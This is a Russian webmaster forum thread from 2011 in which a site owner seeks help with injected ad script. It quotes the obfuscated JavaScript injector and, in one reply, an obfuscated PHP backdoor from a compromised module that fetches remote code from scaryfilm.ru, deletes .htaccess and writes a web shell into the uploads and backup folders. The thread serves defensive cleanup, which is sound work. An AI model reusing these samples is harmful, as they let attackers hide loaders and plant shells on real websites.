Найден вредоносный код
Страницы: 1 2 След.
Найден вредоносный код
Здравствуйте!
У меня проблема, с сегоднешнего утра на моем сайте появился код рекламных партнерок который я не ставил,
код выглядит так "<script type="text/javascript">
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%27%2B%27%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%63%61%72%79%66%69%6C%6D%2E%72%75%2F%61%6A%61%78%2F%6F%6E%6C%69%6E%65%2D%6B%69%6E%6F%2E%70%68%70%22%3E%3C%27%2B%27%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>"
но в шаблоне сайта я такого кода ненашел, можите помочь с решением данной проблемы?

мой сайт: online-kino.ws
McAfee вроде может помочь. Просканируйте им.
Инвестирую в ПАММ-счета АЛЬПАРИ
Публикую интересные рейтинги и топ-листы.
Мать моя женщина.... smile:eek: да у вас весь сайт как советский холодильник в наклейках!
вот именно, из-за этого кода и начали вылезать все эти рич-банеры хотя я их не ставил, и хз где этот скрипт находиться
гляньте в index.php
Цитата
Makintosh пишет:
online-kino.ws

Тут одно ясно нужно всегда обновлять скрипты до последней версии , если ума нет заплатки ставить.
Код был найден или нет?Если нет пиши в асю 626437020
Изменено: Mr.SEO - 14 Ноября 2011 19:46
Ищите ссылку в движке скорей всего , либо в js шаблона

http://scaryfilm.ru/ajax/online-kino.php
Изменено: koper-nikl - 14 Ноября 2011 19:54
менял шаблон на стандартный, тоже самое, этот код внизу страници
Скачивайте двиг на компьютер , ну можете и на хостинге но как для меня так лучше скачать и через Notepad ищите код или ссылку ! Сам код в лс скинул , если нужен конечно !?
значит в footer смотрите
Изменено: zelenograd - 14 Ноября 2011 20:09 (добавил букву)
Даже если Вас съели, всё равно у Вас есть два выхода!
Ищите фтп шелл... скорее всего он в одном из установленных модулей, например videovk_mod.

Там есть такое... сносите к чертям!

$fdsfsdfsdfsd = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess'); file_put_contents(ROOT_DIR.'/'.'b'.'a'.'c'.'k'.'u'.'p'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd))); file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd)));

Как видно шел грузится в uploads/fotos/people.php

А далее обходите все файлы движка и смотрите какие изменения были внесены.
похожая проблема, поймал трояна, который добавляет свой код в htacsess, а также в другие исполняемые файлы.
Думаю проблема в ФТП, но касперский сцука - молчит! говорит все в порядке, сейчас на гугле прочитал про Spyware Terminator - уже обнаружил 22 угрозы, Касперский походу вообще мышей не ловит.

причем это я сейчас к корпоративной версии касперского претензии имею, дома стоит модная интернет-секьюрити 2012 или как там она... вечером дома еще этого терминатора заряжу, если и там будет облом, придется Касперскому письмо писать.
забыл добавить - у меня данный код делает безусловную переадресацию на ахтунг сайт zlubob.org, а оттуда на любые ахтунг сайты, даже неприличного содержания
Попробуйте http://www.cy-pr.com/forum/f80/t22007/
Хостинг Beget на СУПРе
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
19:33 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
17:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:12 Несколько статей хорошо выдаются в Гугле, но отвратительно в Яндексе 
13:40 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
11:41 2Index - быстрая индексация страниц сайта и обратных ссылок 
09:56 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
23:00 Продвижение по ключам 
03:51 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
00:23 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
20:20 Продвижение сайтов 
15:49 Продажа аккаунтов HH.RU 
15:12 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
13:55 Современный скрипт обменника электронных валют 
13:06 AlwaysMoney - платформа для обмена криптовалют 
20:43 Добро пожаловать в цифровой мир... 
15:59 Про мясо 
23:09 ПП от PMS remote.team - 200$ за команду 
13:28 Компьютерная мышь 
22:55 Ну что, кто куда деваете свои сайты? 
22:34 Используете беспроводные наушники? 
22:26 Какой фильм посмотреть сегодня вечером?